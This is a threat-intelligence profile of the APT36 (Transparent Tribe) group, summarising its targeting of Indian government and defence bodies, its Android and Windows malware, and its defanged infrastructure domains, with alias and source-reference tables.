APT36

Threat Actor updated 25 days ago (2024-08-14T09:48:20.905Z)

Download STIX

Preview STIX

APT36, also known as Transparent Tribe and Earth Karkaddan, is a threat actor group that has historically targeted government agencies and defense firms in India with cyberattacks aimed at compromising Windows systems and Android devices. The group's activities have been tracked by various cybersecurity organizations, including Cisco Talos and Zscaler. APT36 has employed tactics such as using romance scams to distribute the CapraRAT Android malware against Indian government officials with information on the Kashmir region. Furthermore, they have expanded their scope of attacks into sectors like education, demonstrating a broadening of their focus beyond traditional governmental and military targets. The Transparent Tribe group has been linked to the usage of XploitSPY, a widely available tool customized by multiple threat actors. However, the modifications found in the apps used by APT36 as part of the eXotic Visit campaign are distinctive from previously documented variants of the XploitSPY malware. The group has also been noted for weaponizing legitimate tools and services as part of its attack infrastructure, extending the living-off-the-land trend. This includes the use of ISO images targeting Windows systems, which began towards the end of 2023 according to BlackBerry. In a significant shift in tactics, Transparent Tribe has started to target Linux systems, utilizing a "desktop entry file" that appears to be a Microsoft Office document. This new attack vector was first documented by Zscaler in September 2023. Despite not being considered highly sophisticated, Transparent Tribe has had success by diversifying its tactics. All three sets of domains - the malicious Transparent Tribe infrastructure, vebhost[.]com, and zainhosting[.]net/com - are related, with "ZainHosting" owning and operating the malicious infrastructure. These domains have been used to register, renew, and administer several malicious web pages over time, including those used by the Transparent Tribe APT in their most recent campaigns.

Description last updated: 2024-08-14T09:04:23.789Z

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
Transparent Tribe	4	Transparent Tribe is a threat actor known for conducting malicious campaigns against organizations in South Asia. The group has been linked to the ObliqueRAT malware and CrimsonRAT through its infrastructure, which includes the domains vebhost[.]com, zainhosting[.]net/com, and others. The group has
SideCopy	3	SideCopy is a Pakistani threat actor that has been operational since at least 2019, primarily targeting South Asian countries, specifically India and Afghanistan. The Advanced Persistent Threat (APT) group uses lures such as archive files embedded with Lnk, Microsoft Publisher or Trojanized Applicat
Sidewinder	3	Sidewinder is a threat actor group that has been active since at least 2012, with possible origins in South Asia. The group has a history of malicious activities and has been linked to a variety of cyber threats, including the use of the Nim backdoor payload. Sidewinder has targeted entities in mult
Mythic Leopard	2	Mythic Leopard, also known as Transparent Tribe, APT36, and ProjectM, is a threat actor group likely fulfilling strategic intelligence requirements for the Pakistani state. This highly prolific group's activities date back to at least 2013 and primarily involve the creation of fake domains that mimi
ProjectM	2	ProjectM, also known as Transparent Tribe, APT36, Copper Fieldstone, and Mythic Leopard, is a threat actor group originating from Pakistan that has been active since 2013. The group has targeted Indian governmental, military, and research organizations, along with their employees, using a variety of

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Apt

Malware

Android

Rat

Trojan

Phishing

Windows

Spyware

Linux

Youtube

Backdoor

Pakistan

Espionage

Scams

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Associated Malware

To see the evidence that has resulted in these malware associations, create a free account

ID	Type	Votes	Profile Description
Crimson	Unspecified	4	Crimson is a type of malware that has been used in various cyber-espionage campaigns, notably by ProjectM. The malware was first observed in 2013 and has been continuously employed in attacks alongside other payloads like Capra RAT and Oblique RAT. ProjectM used multiple domains to control the Crims
Crimson Rat	Unspecified	3	Crimson RAT is a malicious software, or malware, primarily used by the threat actor known as APT36 or Transparent Tribe. This custom .NET Remote Access Trojan (RAT) has been observed in multiple instances of cyber-attacks, mainly targeting India and Afghanistan. Over time, alongside Crimson RAT, Tra

Source Document References

Information about the APT36 Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
DARKReading	3 months ago	Pakistani 'Transparent Tribe' APT Aims for Cross-Platform Impact
Securityaffairs	2 months ago	Security Affairs newsletter Round 479 by Pierluigi Paganini – INTERNATIONAL EDITION
BankInfoSecurity	3 months ago	Pakistan's 'Cosmic Leopard' Is Targeting India With RATs
DARKReading	3 months ago	Pakistani APT 'Celestial Force' Spies on Indian Gov't, Defense Orgs
BankInfoSecurity	4 months ago	Pakistani-Aligned APT36 Targets Indian Defense Organizations
ESET	5 months ago	eXotic Visit campaign: Tracing the footprints of Virtual Invaders
CERT-EU	6 months ago	12 Months of Fighting Cybercrime & Defending Enterprises \| #cybercrime \| #infosec \| National Cyber Security Consulting
CERT-EU	9 months ago	Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities
CERT-EU	10 months ago	SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT
CERT-EU	10 months ago	DoNot Team's New Firebird Backdoor Hits Pakistan and Afghanistan
CERT-EU	a year ago	Cyber Security Week in Review: September 22, 2023
CERT-EU	a year ago	Fake YouTube Android Apps Used to Distribute CapraRAT
CERT-EU	a year ago	Second highest ransomware profits expected this year
CERT-EU	a year ago	Fake YouTube apps leveraged for CapraRAT malware distribution
CERT-EU	a year ago	Chinese cyberespionage campaign involves novel Linux backdoor
CERT-EU	a year ago	Hackers Using Fake YouTube Apps To Infect Android Devices
CERT-EU	a year ago	CapraTube - Transparent Tribe's CapraRAT mimics YouTube to hijack Android phones – Global Security Mag Online
DARKReading	a year ago	CapraRAT Impersonates YouTube to Hijack Android Devices
CERT-EU	a year ago	CapraTube \| Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones
CERT-EU	a year ago	APT36 state hackers infect Android devices using YouTube app clones